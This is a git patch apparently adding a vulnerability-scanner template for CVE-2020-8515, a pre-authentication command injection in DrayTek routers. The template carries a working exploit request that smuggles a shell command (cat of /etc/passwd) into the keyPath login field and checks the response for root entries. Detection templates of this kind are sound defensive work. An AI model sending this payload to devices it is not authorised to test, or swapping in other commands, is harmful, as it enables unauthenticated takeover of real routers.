From ee82f8364e49a10a4a9eb72941779290192adea9 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 28 Jan 2021 15:30:20 +0000 Subject: [PATCH 1/2] Create CVE-2020-8515 --- cves/2020/CVE-2020-8515 | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 cves/2020/CVE-2020-8515 diff --git a/cves/2020/CVE-2020-8515 b/cves/2020/CVE-2020-8515 new file mode 100644 index 0000000000..5eed7ce4ae --- /dev/null +++ b/cves/2020/CVE-2020-8515 @@ -0,0 +1,28 @@ +id: CVE-2020-8515 + +info: + name: DrayTek pre-auth RCE + author: pikpikcu + severity: critical + + # References: + # https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515) + # https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ + +requests: + - raw: + - | + POST /cgi-bin/mainfunction.cgi HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: */* + Connection: close + + action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + part: body From 81891e9cbd3433bcf656c4ffc1a953d82476828e Mon Sep 17 00:00:00 2001 From: PD-Team <8293321+bauthard@users.noreply.github.com> Date: Fri, 29 Jan 2021 00:23:43 +0530 Subject: [PATCH 2/2] file name update --- cves/2020/{CVE-2020-8515 => CVE-2020-8515.yaml} | 5 +++++ 1 file changed, 5 insertions(+) rename cves/2020/{CVE-2020-8515 => CVE-2020-8515.yaml} (83%) diff --git a/cves/2020/CVE-2020-8515 b/cves/2020/CVE-2020-8515.yaml similarity index 83% rename from cves/2020/CVE-2020-8515 rename to cves/2020/CVE-2020-8515.yaml index 5eed7ce4ae..7ed50489fd 100644 --- a/cves/2020/CVE-2020-8515 +++ b/cves/2020/CVE-2020-8515.yaml @@ -4,6 +4,7 @@ info: name: DrayTek pre-auth RCE author: pikpikcu severity: critical + reference: https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ # References: # https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515) @@ -26,3 +27,7 @@ requests: regex: - "root:[x*]:0:0:" part: body + + - type: status + status: + - 200 \ No newline at end of file